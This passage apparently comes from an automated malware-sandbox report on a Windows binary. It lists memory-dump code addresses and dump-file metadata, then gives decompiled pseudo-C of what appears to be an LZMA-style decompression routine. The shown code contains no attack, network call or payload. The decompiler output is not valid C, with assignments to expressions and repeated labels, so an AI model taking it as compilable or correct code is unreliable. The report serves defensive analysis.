              0x00406fa7
              0x00406fab
              0x00000000
              0x00000000
              0x00406fb1
              0x00406fb5
              0x00000000
              0x00000000
              0x00406fbb
              0x00406fbd
              0x00406fc1
              0x00406fc1
              0x00406fc4
              0x00406fc8
              0x00000000
              0x00000000
              0x00000000
              0x00000000
              0x0040703f
              0x00407043
              0x0040704a
              0x0040704d
              0x00407050
              0x00407045
              0x00407045
              0x00407045
              0x00407053
              0x00407056
              0x00000000
              0x00000000
              0x004070ff
              0x004070ff
              0x00407103
              0x004074a1
              0x00000000
              0x004074a1
              0x00407109
              0x0040710c
              0x0040710f
              0x00407113
              0x00407116
              0x0040711c
              0x0040711e
              0x0040711e
              0x0040711e
              0x00407121
              0x00407124
              0x00000000
              0x00000000
              0x00406cf4
              0x00406cf4
              0x00406cf8
              0x00407465
              0x00000000
              0x00407465
              0x00406cfe
              0x00406d01
              0x00406d04
              0x00406d08
              0x00406d0b
              0x00406d11
              0x00406d13
              0x00406d13
              0x00406d13
              0x00406d16
              0x00406d19
              0x00406d19
              0x00406d1c
              0x00406d1f
              0x00000000
              0x00000000
              0x00406d25
              0x00406d2b
              0x00000000
              0x00000000
              0x00406d31
              0x00406d31
              0x00406d35
              0x00406d38
              0x00406d3b
              0x00406d3e
              0x00406d41
              0x00406d42
              0x00406d45
              0x00406d47
              0x00406d4d
              0x00406d50
              0x00406d53
              0x00406d56
              0x00406d59
              0x00406d5c
              0x00406d5f
              0x00406d7b
              0x00406d7e
              0x00406d81
              0x00406d84
              0x00406d8b
              0x00406d8f
              0x00406d91
              0x00406d95
              0x00406d61
              0x00406d61
              0x00406d65
              0x00406d6d
              0x00406d72
              0x00406d74
              0x00406d76
              0x00406d76
              0x00406d98
              0x00406d9f
              0x00406da2
              0x00000000
              0x00406da8
              0x00000000
              0x00406da8
              0x00000000
              0x00406dad
              0x00406dad
              0x00406db1
              0x00407471
              0x00000000
              0x00407471
              0x00406db7
              0x00406dba
              0x00406dbd
              0x00406dc1
              0x00406dc4
              0x00406dca
              0x00406dcc
              0x00406dcc
              0x00406dcc
              0x00406dcf
              0x00406dd2
              0x00406dd2
              0x00406dd2
              0x00406dd8
              0x00000000
              0x00000000
              0x00406dda
              0x00406ddd
              0x00406de0
              0x00406de3
              0x00406de6
              0x00406de9
              0x00406dec
              0x00406def
              0x00406df2
              0x00406df5
              0x00406df8
              0x00406e10
              0x00406e13
              0x00406e16
              0x00406e19
              0x00406e19
              0x00406e1c
              0x00406e20
              0x00406e22
              0x00406dfa
              0x00406dfa
              0x00406e02
              0x00406e07
              0x00406e09
              0x00406e0b
              0x00406e0b
              0x00406e25
              0x00406e2c
              0x00406e2f
              0x00000000
              0x00406e31
              0x00000000
              0x00406e31
              0x00406e2f
              0x00406e36
              0x00406e36
              0x00406e36
              0x00406e36
              0x00000000
              0x00000000
              0x00406e71
              0x00406e71
              0x00406e75
              0x0040747d
              0x00000000
              0x0040747d
              0x00406e7b
              0x00406e7e
              0x00406e81
              0x00406e85
              0x00406e88
              0x00406e8e
              0x00406e90
              0x00406e90
              0x00406e90
              0x00406e93
              0x00406e96
              0x00406e96
              0x00406e9c
              0x00406e3a
              0x00406e3a
              0x00406e3d
              0x00000000
              0x00406e3d
              0x00406e9e
              0x00406e9e
              0x00406ea1
              0x00406ea4
              0x00406ea7
              0x00406eaa
              0x00406ead
              0x00406eb0
              0x00406eb3
              0x00406eb6
              0x00406eb9
              0x00406ebc
              0x00406ed4
              0x00406ed7
              0x00406eda
              0x00406edd
              0x00406edd
              0x00406ee0
              0x00406ee4
              0x00406ee6
              0x00406ebe
              0x00406ebe
              0x00406ec6
              0x00406ecb
              0x00406ecd
              0x00406ecf
              0x00406ecf
              0x00406ee9
              0x00406ef0
              0x00406ef3
              0x00000000
              0x00406ef5
              0x00000000
              0x00406ef5
              0x00000000
              0x00407182
              0x00407182
              0x00407186
              0x004074ad
              0x00000000
              0x004074ad
              0x0040718c
              0x0040718f
              0x00407192
              0x00407196
              0x00407199
              0x0040719f
              0x004071a1
              0x004071a1
              0x004071a1
              0x004071a4
              0x00000000
              0x00000000
              0x00000000
              0x00000000
              0x00407291
              0x00407295
              0x004072b7
              0x004072ba
              0x004072c4
              0x004072c7
              0x004072c7
              0x004072c7
              0x00000000
              0x004072c7
              0x004072c7
              0x00407297
              0x0040729a
              0x0040729e
              0x004072a1
              0x004072a1
              0x004072a4
              0x00000000
              0x00000000
              0x0040734e
              0x00407352
              0x00407370
              0x00407370
              0x00407370
              0x00407377
              0x0040737e
              0x00407385
              0x00407385
              0x00000000
              0x00407385
              0x00407354
              0x00407357
              0x0040735a
              0x0040735d
              0x00407364
              0x004072a8
              0x004072a8
              0x004072ab
              0x00000000
              0x00000000
              0x0040743f
              0x00407442
              0x00407343
              0x00000000
              0x00000000
              0x00407079
              0x0040707b
              0x00407082
              0x00407083
              0x00407085
              0x00407088
              0x00000000
              0x00000000
              0x00407090
              0x00407093
              0x00407096
              0x00407098
              0x0040709a
              0x0040709a
              0x0040709b
              0x0040709e
              0x004070a5
              0x004070a8
              0x004070b6
              0x00000000
              0x00000000
              0x0040738c
              0x0040738c
              0x0040738f
              0x00407396
              0x00000000
              0x00000000
              0x0040739b
              0x0040739b
              0x0040739f
              0x004074d7
              0x00000000
              0x004074d7
              0x004073a5
              0x004073a8
              0x004073ab
              0x004073af
              0x004073b2
              0x004073b8
              0x004073ba
              0x004073ba
              0x004073ba
              0x004073bd
              0x004073c0
              0x004073c0
              0x004073c0
              0x004073c0
              0x004073c3
              0x004073c3
              0x004073c7
              0x00407427
              0x0040742a
              0x0040742f
              0x00407430
              0x00407432
              0x00407434
              0x00407437
              0x00407343
              0x00407343
              0x00000000
              0x00407349
              0x00407343
              0x004073c9
              0x004073cf
              0x004073d2
              0x004073d5
              0x004073d8
              0x004073db
              0x004073de
              0x004073e1
              0x004073e4
              0x004073e7
              0x004073ea
              0x00407403
              0x00407406
              0x00407409
              0x0040740c
              0x00407410
              0x00407412
              0x00407412
              0x00407413
              0x00407416
              0x004073ec
              0x004073ec
              0x004073f4
              0x004073f9
              0x004073fb
              0x004073fe
              0x004073fe
              0x00407419
              0x00407420
              0x00000000
              0x00407422
              0x00000000
              0x00407422
              0x00000000
              0x004070be
              0x004070c1
              0x004070f7
              0x00407227
              0x00407227
              0x00407227
              0x00407227
              0x0040722a
              0x0040722a
              0x0040722d
              0x0040722f
              0x004074b9
              0x00000000
              0x004074b9
              0x00407235
              0x00407238
              0x00000000
              0x00000000
              0x0040723e
              0x00407242
              0x00407245
              0x00407245
              0x00407245
              0x00000000
              0x00407245
              0x004070c3
              0x004070c5
              0x004070c7
              0x004070c9
              0x004070cc
              0x004070cd
              0x004070cf
              0x004070d1
              0x004070d4
              0x004070d7
              0x004070ed
              0x004070f2
              0x0040712a
              0x0040712a
              0x0040712e
              0x0040715a
              0x0040715c
              0x00407163
              0x00407166
              0x00407169
              0x00407169
              0x0040716e
              0x0040716e
              0x00407170
              0x00407173
              0x0040717a
              0x0040717d
              0x004071aa
              0x004071aa
              0x004071ad
              0x004071b0
              0x00407224
              0x00407224
              0x00407224
              0x00000000
              0x00407224
              0x004071b2
              0x004071b8
              0x004071bb
              0x004071be
              0x004071c1
              0x004071c4
              0x004071c7
              0x004071ca
              0x004071cd
              0x004071d0
              0x004071d3
              0x004071ec
              0x004071ee
              0x004071f1
              0x004071f2
              0x004071f5
              0x004071f7
              0x004071fa
              0x004071fc
              0x004071fe
              0x00407201
              0x00407203
              0x00407206
              0x0040720a
              0x0040720c
              0x0040720c
              0x0040720d
              0x00407210
              0x00407213
              0x004071d5
              0x004071d5
              0x004071dd
              0x004071e2
              0x004071e4
              0x004071e7
              0x004071e7
              0x00407216
              0x0040721d
              0x004071a7
              0x004071a7
              0x004071a7
              0x004071a7
              0x00000000
              0x0040721f
              0x00000000
              0x0040721f
              0x0040721d
              0x00407130
              0x00407133
              0x00407135
              0x00407138
              0x0040713b
              0x0040713e
              0x00407140
              0x00407143
              0x00407146
              0x00407146
              0x00407149
              0x00407149
              0x0040714c
              0x00407153
              0x00407127
              0x00407127
              0x00407127
              0x00407127
              0x00000000
              0x00407155
              0x00000000
              0x00407155
              0x00407153
              0x004070d9
              0x004070dc
              0x004070de
              0x004070e1
              0x00000000
              0x00000000
              0x00406e40
              0x00406e40
              0x00406e44
              0x00407489
              0x00000000
              0x00407489
              0x00406e4a
              0x00406e4d
              0x00406e50
              0x00406e53
              0x00406e56
              0x00406e59
              0x00406e5c
              0x00406e5e
              0x00406e61
              0x00406e64
              0x00406e67
              0x00406e69
              0x00406e69
              0x00406e69
              0x00000000
              0x00000000
              0x00406fcb
              0x00406fcb
              0x00406fcf
              0x00407495
              0x00000000
              0x00407495
              0x00406fd5
              0x00406fd8
              0x00406fdb
              0x00406fde
              0x00406fe0
              0x00406fe0
              0x00406fe0
              0x00406fe3
              0x00406fe6
              0x00406fe9
              0x00406fec
              0x00406fef
              0x00406ff2
              0x00406ff3
              0x00406ff5
              0x00406ff5
              0x00406ff5
              0x00406ff8
              0x00406ffb
              0x00406ffe
              0x00407001
              0x00407001
              0x00407001
              0x00407004
              0x00407006
              0x00407006
              0x00000000
              0x00000000
              0x00407248
              0x00407248
              0x00407248
              0x0040724c
              0x00000000
              0x00000000
              0x00407252
              0x00407255
              0x00407258
              0x0040725b
              0x0040725d
              0x0040725d
              0x0040725d
              0x00407260
              0x00407263
              0x00407266
              0x00407269
              0x0040726c
              0x0040726f
              0x00407270
              0x00407272
              0x00407272
              0x00407272
              0x00407275
              0x00407278
              0x0040727b
              0x0040727e
              0x00407281
              0x00407285
              0x00407287
              0x0040728a
              0x00000000
              0x0040728c
              0x00407009
              0x00407009
              0x00000000
              0x00407009
              0x0040728a
              0x004074bf
              0x00000000
              0x00000000
              0x00406aee
              0x004074f6
              0x004074f6
              0x00000000
              0x004074f6
              0x00407343
              0x004072ca
              0x004072c7
              0x00000000
              0x0040701c

              Memory Dump Source
              • Source File: 00000001.00000002.665305559.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
              • Associated: 00000001.00000002.665292449.0000000000400000.00000002.00020000.sdmp Download File
              • Associated: 00000001.00000002.665364092.0000000000408000.00000002.00020000.sdmp Download File
              • Associated: 00000001.00000002.665378913.000000000040A000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.665383681.000000000040C000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.665411947.0000000000414000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.665438070.0000000000427000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.665452320.0000000000435000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.665456458.0000000000437000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.665468957.000000000043B000.00000002.00020000.sdmp Download File
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: afcc572d84cf9765722162092f48605f1f6e2a9c19f2086930970e637c6b8744
              • Instruction ID: ba5f555e51aa8b1381cdd2b0d2a1af6e0fef70f9c7cb40d8a5f6f768353cc961
              • Opcode Fuzzy Hash: afcc572d84cf9765722162092f48605f1f6e2a9c19f2086930970e637c6b8744
              • Instruction Fuzzy Hash: 30713371E04228CFDF28CFA8C854BADBBB1FB44305F15806AD856BB281C7786986DF45
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00406F64, Relevance: 5.2, APIs: 4, Instructions: 168COMMON
              Download Yara Rule
              C-Code - Quality: 98%
              			E00406F64() {
				unsigned short _t531;
				signed int _t532;
				void _t533;
				signed int _t534;
				signed int _t535;
				signed int _t565;
				signed int _t568;
				signed int _t589;
				signed int* _t606;
				void* _t613;

				L0:
				while(1) {
					L0:
					if( *(_t613 - 0x40) != 0) {
						 *(_t613 - 0x84) = 0xa;
						_t606 =  *(_t613 - 4) + 0x1b0 +  *(_t613 - 0x38) * 2;
					} else {
						 *(__ebp - 0x84) = 9;
						 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
					}
					while(1) {
						 *(_t613 - 0x54) = _t606;
						while(1) {
							L133:
							_t531 =  *_t606;
							_t589 = _t531 & 0x0000ffff;
							_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
							if( *(_t613 - 0xc) >= _t565) {
								 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
								 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
								 *(_t613 - 0x40) = 1;
								_t532 = _t531 - (_t531 >> 5);
								 *_t606 = _t532;
							} else {
								 *(_t613 - 0x10) = _t565;
								 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
								 *_t606 = (0x800 - _t589 >> 5) + _t531;
							}
							if( *(_t613 - 0x10) >= 0x1000000) {
								goto L139;
							}
							L137:
							if( *(_t613 - 0x6c) == 0) {
								 *(_t613 - 0x88) = 5;
								L170:
								_t568 = 0x22;
								memcpy( *(_t613 - 0x90), _t613 - 0x88, _t568 << 2);
								_t535 = 0;
								L172:
								return _t535;
							}
							 *(_t613 - 0x10) =  *(_t613 - 0x10) << 8;
							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
							 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
							 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
							L139:
							_t533 =  *(_t613 - 0x84);
							while(1) {
								 *(_t613 - 0x88) = _t533;
								while(1) {
									L1:
									_t534 =  *(_t613 - 0x88);
									if(_t534 > 0x1c) {
										break;
									}
									switch( *((intOrPtr*)(_t534 * 4 +  &M004074FE))) {
										case 0:
											if( *(_t613 - 0x6c) == 0) {
												goto L170;
											}
											 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
											 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
											_t534 =  *( *(_t613 - 0x70));
											if(_t534 > 0xe1) {
												goto L171;
											}
											_t538 = _t534 & 0x000000ff;
											_push(0x2d);
											asm("cdq");
											_pop(_t570);
											_push(9);
											_pop(_t571);
											_t609 = _t538 / _t570;
											_t540 = _t538 % _t570 & 0x000000ff;
											asm("cdq");
											_t604 = _t540 % _t571 & 0x000000ff;
											 *(_t613 - 0x3c) = _t604;
											 *(_t613 - 0x1c) = (1 << _t609) - 1;
											 *((intOrPtr*)(_t613 - 0x18)) = (1 << _t540 / _t571) - 1;
											_t612 = (0x300 << _t604 + _t609) + 0x736;
											if(0x600 ==  *((intOrPtr*)(_t613 - 0x78))) {
												L10:
												if(_t612 == 0) {
													L12:
													 *(_t613 - 0x48) =  *(_t613 - 0x48) & 0x00000000;
													 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
													goto L15;
												} else {
													goto L11;
												}
												do {
													L11:
													_t612 = _t612 - 1;
													 *((short*)( *(_t613 - 4) + _t612 * 2)) = 0x400;
												} while (_t612 != 0);
												goto L12;
											}
											if( *(_t613 - 4) != 0) {
												GlobalFree( *(_t613 - 4));
											}
											_t534 = GlobalAlloc(0x40, 0x600); // executed
											 *(_t613 - 4) = _t534;
											if(_t534 == 0) {
												goto L171;
											} else {
												 *((intOrPtr*)(_t613 - 0x78)) = 0x600;
												goto L10;
											}
										case 1:
											L13:
											__eflags =  *(_t613 - 0x6c);
											if( *(_t613 - 0x6c) == 0) {
												 *(_t613 - 0x88) = 1;
												goto L170;
											}
											 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
											 *(_t613 - 0x40) =  *(_t613 - 0x40) | ( *( *(_t613 - 0x70)) & 0x000000ff) <<  *(_t613 - 0x48) << 0x00000003;
											 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
											_t45 = _t613 - 0x48;
											 *_t45 =  *(_t613 - 0x48) + 1;
											__eflags =  *_t45;
											L15:
											if( *(_t613 - 0x48) < 4) {
												goto L13;
											}
											_t546 =  *(_t613 - 0x40);
											if(_t546 ==  *(_t613 - 0x74)) {
												L20:
												 *(_t613 - 0x48) = 5;
												 *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) =  *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) & 0x00000000;
												goto L23;
											}
											 *(_t613 - 0x74) = _t546;
											if( *(_t613 - 8) != 0) {
												GlobalFree( *(_t613 - 8));
											}
											_t534 = GlobalAlloc(0x40,  *(_t613 - 0x40)); // executed
											 *(_t613 - 8) = _t534;
											if(_t534 == 0) {
												goto L171;
											} else {
												goto L20;
											}
										case 2:
											L24:
											_t553 =  *(_t613 - 0x60) &  *(_t613 - 0x1c);
											 *(_t613 - 0x84) = 6;
											 *(_t613 - 0x4c) = _t553;
											_t606 =  *(_t613 - 4) + (( *(_t613 - 0x38) << 4) + _t553) * 2;
											 *(_t613 - 0x54) = _t606;
											goto L133;
										case 3:
											L21:
											__eflags =  *(_t613 - 0x6c);
											if( *(_t613 - 0x6c) == 0) {
												 *(_t613 - 0x88) = 3;
												goto L170;
											}
											 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
											_t67 = _t613 - 0x70;
											 *_t67 =  &(( *(_t613 - 0x70))[1]);
											__eflags =  *_t67;
											 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
											L23:
											 *(_t613 - 0x48) =  *(_t613 - 0x48) - 1;
											if( *(_t613 - 0x48) != 0) {
												goto L21;
											}
											goto L24;
										case 4:
											L133:
											_t531 =  *_t606;
											_t589 = _t531 & 0x0000ffff;
											_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
											if( *(_t613 - 0xc) >= _t565) {
												 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
												 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
												 *(_t613 - 0x40) = 1;
												_t532 = _t531 - (_t531 >> 5);
												 *_t606 = _t532;
											} else {
												 *(_t613 - 0x10) = _t565;
												 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
												 *_t606 = (0x800 - _t589 >> 5) + _t531;
											}
											if( *(_t613 - 0x10) >= 0x1000000) {
												goto L139;
											}
										case 5:
											goto L137;
										case 6:
											__edx = 0;
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x34) = 1;
												 *(__ebp - 0x84) = 7;
												__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
												while(1) {
													 *(_t613 - 0x54) = _t606;
													goto L133;
												}
											}
											__eax =  *(__ebp - 0x5c) & 0x000000ff;
											__esi =  *(__ebp - 0x60);
											__cl = 8;
											__cl = 8 -  *(__ebp - 0x3c);
											__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
											__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
											__ecx =  *(__ebp - 0x3c);
											__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
											__ecx =  *(__ebp - 4);
											(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
											__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
											__eflags =  *(__ebp - 0x38) - 4;
											__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
											 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
											if( *(__ebp - 0x38) >= 4) {
												__eflags =  *(__ebp - 0x38) - 0xa;
												if( *(__ebp - 0x38) >= 0xa) {
													_t98 = __ebp - 0x38;
													 *_t98 =  *(__ebp - 0x38) - 6;
													__eflags =  *_t98;
												} else {
													 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
												}
											} else {
												 *(__ebp - 0x38) = 0;
											}
											__eflags =  *(__ebp - 0x34) - __edx;
											if( *(__ebp - 0x34) == __edx) {
												__ebx = 0;
												__ebx = 1;
												goto L61;
											} else {
												__eax =  *(__ebp - 0x14);
												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
												__eflags = __eax -  *(__ebp - 0x74);
												if(__eax >=  *(__ebp - 0x74)) {
													__eax = __eax +  *(__ebp - 0x74);
													__eflags = __eax;
												}
												__ecx =  *(__ebp - 8);
												__ebx = 0;
												__ebx = 1;
												__al =  *((intOrPtr*)(__eax + __ecx));
												 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
												goto L41;
											}
										case 7:
											__eflags =  *(__ebp - 0x40) - 1;
											if( *(__ebp - 0x40) != 1) {
												__eax =  *(__ebp - 0x24);
												 *(__ebp - 0x80) = 0x16;
												 *(__ebp - 0x20) =  *(__ebp - 0x24);
												__eax =  *(__ebp - 0x28);
												 *(__ebp - 0x24) =  *(__ebp - 0x28);
												__eax =  *(__ebp - 0x2c);
												 *(__ebp - 0x28) =  *(__ebp - 0x2c);
												__eax = 0;
												__eflags =  *(__ebp - 0x38) - 7;
												0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
												__al = __al & 0x000000fd;
												__eax = (__eflags >= 0) - 1 + 0xa;
												 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
												__eax =  *(__ebp - 4);
												__eax =  *(__ebp - 4) + 0x664;
												__eflags = __eax;
												 *(__ebp - 0x58) = __eax;
												goto L69;
											}
											__eax =  *(__ebp - 4);
											__ecx =  *(__ebp - 0x38);
											 *(__ebp - 0x84) = 8;
											__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
											while(1) {
												 *(_t613 - 0x54) = _t606;
												goto L133;
											}
										case 8:
											goto L0;
										case 9:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												goto L89;
											}
											__eflags =  *(__ebp - 0x60);
											if( *(__ebp - 0x60) == 0) {
												goto L171;
											}
											__eax = 0;
											__eflags =  *(__ebp - 0x38) - 7;
											_t258 =  *(__ebp - 0x38) - 7 >= 0;
											__eflags = _t258;
											0 | _t258 = _t258 + _t258 + 9;
											 *(__ebp - 0x38) = _t258 + _t258 + 9;
											goto L75;
										case 0xa:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x84) = 0xb;
												__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
												while(1) {
													 *(_t613 - 0x54) = _t606;
													goto L133;
												}
											}
											__eax =  *(__ebp - 0x28);
											goto L88;
										case 0xb:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__ecx =  *(__ebp - 0x24);
												__eax =  *(__ebp - 0x20);
												 *(__ebp - 0x20) =  *(__ebp - 0x24);
											} else {
												__eax =  *(__ebp - 0x24);
											}
											__ecx =  *(__ebp - 0x28);
											 *(__ebp - 0x24) =  *(__ebp - 0x28);
											L88:
											__ecx =  *(__ebp - 0x2c);
											 *(__ebp - 0x2c) = __eax;
											 *(__ebp - 0x28) =  *(__ebp - 0x2c);
											L89:
											__eax =  *(__ebp - 4);
											 *(__ebp - 0x80) = 0x15;
											__eax =  *(__ebp - 4) + 0xa68;
											 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
											goto L69;
										case 0xc:
											L99:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xc;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t334 = __ebp - 0x70;
											 *_t334 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t334;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											__eax =  *(__ebp - 0x2c);
											goto L101;
										case 0xd:
											L37:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xd;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t122 = __ebp - 0x70;
											 *_t122 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t122;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											L39:
											__eax =  *(__ebp - 0x40);
											__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
											if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
												goto L48;
											}
											__eflags = __ebx - 0x100;
											if(__ebx >= 0x100) {
												goto L54;
											}
											L41:
											__eax =  *(__ebp - 0x5b) & 0x000000ff;
											 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
											__ecx =  *(__ebp - 0x58);
											__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
											 *(__ebp - 0x48) = __eax;
											__eax = __eax + 1;
											__eax = __eax << 8;
											__eax = __eax + __ebx;
											__esi =  *(__ebp - 0x58) + __eax * 2;
											 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
											__ax =  *__esi;
											 *(__ebp - 0x54) = __esi;
											__edx = __ax & 0x0000ffff;
											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
											__eflags =  *(__ebp - 0xc) - __ecx;
											if( *(__ebp - 0xc) >= __ecx) {
												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
												__cx = __ax;
												 *(__ebp - 0x40) = 1;
												__cx = __ax >> 5;
												__eflags = __eax;
												__ebx = __ebx + __ebx + 1;
												 *__esi = __ax;
											} else {
												 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
												 *(__ebp - 0x10) = __ecx;
												0x800 = 0x800 - __edx;
												0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
												__ebx = __ebx + __ebx;
												 *__esi = __cx;
											}
											__eflags =  *(__ebp - 0x10) - 0x1000000;
											 *(__ebp - 0x44) = __ebx;
											if( *(__ebp - 0x10) >= 0x1000000) {
												goto L39;
											} else {
												goto L37;
											}
										case 0xe:
											L46:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xe;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t156 = __ebp - 0x70;
											 *_t156 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t156;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											while(1) {
												L48:
												__eflags = __ebx - 0x100;
												if(__ebx >= 0x100) {
													break;
												}
												__eax =  *(__ebp - 0x58);
												__edx = __ebx + __ebx;
												__ecx =  *(__ebp - 0x10);
												__esi = __edx + __eax;
												__ecx =  *(__ebp - 0x10) >> 0xb;
												__ax =  *__esi;
												 *(__ebp - 0x54) = __esi;
												__edi = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													_t170 = __edx + 1; // 0x1
													__ebx = _t170;
													__cx = __ax >> 5;
													__eflags = __eax;
													 *__esi = __ax;
												} else {
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edi;
													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
													__ebx = __ebx + __ebx;
													 *__esi = __cx;
												}
